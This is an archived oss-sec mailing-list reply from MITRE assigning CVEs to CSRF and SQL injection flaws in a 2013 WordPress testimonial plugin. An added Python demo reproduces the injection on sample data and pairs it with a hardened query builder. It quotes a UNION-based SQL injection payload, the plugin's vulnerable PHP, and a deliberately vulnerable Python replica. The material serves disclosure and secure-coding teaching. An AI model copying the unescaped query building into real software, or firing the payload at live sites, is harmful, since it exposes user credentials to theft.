
oss-sec mailing list archives

Re: [CVE Request] IndiaNIC Testimonial 2.2 WP plugin
From: cve-assign () mitre org
Date: Sun, 1 Sep 2013 20:43:16 -0400 (EDT)

> The testimonial plugin by IndiaNIC contains CSRF, XSS and SQLi vulnerabilities.
> I was able to deface the website, extract user credentials etc through crafted forms.
> Can someone please assign CVEs to this?
>
> 1: http://seclists.org/fulldisclosure/2013/Sep/5


The entire disclosure seems to be based on CSRF attacks against an
admin. Based on what you sent, we are not sure whether XSS is an
independent vulnerability in this plugin. Is there a usable XSS attack
that does not require a CSRF vulnerability, and does not require that
the admin intentionally enter an XSS attack string during an
authenticated session?

The SQL injection:

  name="custom_query" value="1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#"

is something that we would typically expect is an independent
vulnerability. A person who has admin access within a web interface is
not necessarily authorized to execute arbitrary SQL statements. We
found this code that seems to be relevant:

      // custom_query comes from the plugin's template settings and is
      // concatenated into the WHERE clause without escaping or validation
      if ($_template_data['custom_query']) {
        $filter_by = " AND ({$_template_data['custom_query']})";
      }

      // the ord_by setting is interpolated into ORDER BY the same way
      $_testimonial_result = $this->wpdb->get_results(
        "SELECT * FROM {$this->wpdb->prefix}inic_testimonial WHERE (id NOT IN(" .
        implode(",", $_current_featured_testimonial_id) . ")){$filter_by}
        ORDER BY {$_template_data['ord_by']} LIMIT {$_no_of_testimonial}");

So, the outcome at this point is:

  IndiaNIC Testimonial plugin 2.2 for WordPress

  CSRF:           Use CVE-2013-5672.
  SQL injection:  Use CVE-2013-5673.
  XSS:            no CVE assigned; waiting for other information that
                  XSS is an independent primary vulnerability here

MITRE's CVE team does not do vulnerability coordination, but we think
this disclosure process is not what the vendor would have preferred:

  2013-08-07 - Email sent to IndiaNIC
  2013-08-08 - Notification left on the plugin's Support board on wordpress.org

Please see the "For a WordPress plugin security issue, email plugins
[at] wordpress.org" step listed on the
http://codex.wordpress.org/FAQ_Security web page.

-- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
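The following is an added example, not code from the plugin or from the message above. It reproduces, in Python over an in-memory SQLite database, the string building shown in the quoted PHP (custom_query and ord_by pasted straight into the SQL text), runs the reported custom_query payload against it to show the pivot into the users table, and places a hardened builder beside it. The table names, columns, rows and password hash are constructed sample data; the payload is adapted to SQLite (a `--` comment instead of MySQL's `#`, four columns instead of fourteen, no `@@version`); the whitelists and the structured `filter` setting are assumptions about what a fix could look like, not the vendor's fix.

```python
import sqlite3

PREFIX = "wp_"                              # stands in for $this->wpdb->prefix
ORDER_COLUMNS = {"id", "name", "company"}   # assumed whitelist for ORDER BY
FILTER_COLUMNS = {"company", "name"}        # assumed whitelist for structured filters


def make_db():
    """Constructed sample schema: the testimonial table plus a wp_users table
    holding one fake password hash, the data an injected UNION pivots to."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE wp_inic_testimonial (id INTEGER, name TEXT, company TEXT, testimonial TEXT);"
        "INSERT INTO wp_inic_testimonial VALUES (1,'Alice','ACME','Great plugin'),"
        " (2,'Bob','Initech','Works fine'), (3,'Carol','Globex','Recommended');"
        "CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT, user_email TEXT);"
        "INSERT INTO wp_users VALUES (1,'admin','$P$BconstructedFakeHash','admin@example.invalid');"
    )
    return db


def vulnerable_query(template_data, featured_ids, limit):
    """Mirrors the PHP quoted in the message: custom_query and ord_by are
    concatenated into the SQL text unescaped."""
    filter_by = ""
    if template_data.get("custom_query"):
        filter_by = " AND ({})".format(template_data["custom_query"])
    return (
        "SELECT * FROM {p}inic_testimonial WHERE (id NOT IN({ids})){f} "
        "ORDER BY {o} LIMIT {n}"
    ).format(p=PREFIX, ids=",".join(str(i) for i in featured_ids),
             f=filter_by, o=template_data["ord_by"], n=limit)


def safe_query(template_data, featured_ids, limit):
    """Hardened builder (added here, not the plugin's fix): no raw SQL fragment
    is accepted from settings; filters are column/value pairs bound as
    parameters; the ORDER BY column, which cannot be bound, is whitelisted."""
    if template_data.get("custom_query"):
        raise ValueError("custom_query: raw SQL from settings is not accepted")
    ord_by = template_data.get("ord_by", "id")
    if ord_by not in ORDER_COLUMNS:
        raise ValueError("ord_by: column not allowed: %r" % ord_by)
    clauses, params = [], []
    if featured_ids:  # an empty list would otherwise yield the invalid 'NOT IN()'
        clauses.append("id NOT IN (%s)" % ",".join("?" * len(featured_ids)))
        params.extend(int(i) for i in featured_ids)
    for col, val in template_data.get("filter", {}).items():
        if col not in FILTER_COLUMNS:
            raise ValueError("filter: column not allowed: %r" % col)
        clauses.append("%s = ?" % col)
        params.append(val)
    where = " WHERE " + " AND ".join(clauses) if clauses else ""
    sql = "SELECT * FROM %sinic_testimonial%s ORDER BY %s LIMIT ?" % (PREFIX, where, ord_by)
    params.append(int(limit))
    return sql, params


def run(db, sql, params=()):
    return db.execute(sql, params).fetchall()


# The reported payload, adapted to SQLite: '--' in place of MySQL's '#' comment,
# and four columns to match the constructed table. The closing ')' terminates
# the plugin's WHERE group; the comment discards the trailing ORDER BY / LIMIT.
PAYLOAD = "1=1) UNION SELECT ID, user_login, user_pass, user_email FROM wp_users --"


def demo():
    db = make_db()
    attacker = {"custom_query": PAYLOAD, "ord_by": "id"}
    leaked = run(db, vulnerable_query(attacker, [1], 10))
    try:
        safe_query(attacker, [1], 10)
        blocked = False
    except ValueError:
        blocked = True
    sql, params = safe_query({"ord_by": "name", "filter": {"company": "ACME"}}, [], 10)
    return leaked, blocked, run(db, sql, params)


if __name__ == "__main__":
    leaked, blocked, legit = demo()
    for row in leaked:
        print(row)
    print("hardened builder rejected payload:", blocked)
    print("legitimate query rows:", legit)
```

Running `demo()` returns the two remaining testimonial rows plus the admin row with its hash in the leaked result, which is the point MITRE makes above: a settings field that is pasted into SQL lets whoever can set it (an admin, or a CSRF victim acting as one) read any table the database user can reach. In real MySQL the `#` comment and `@@version` from the original payload work the same way.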
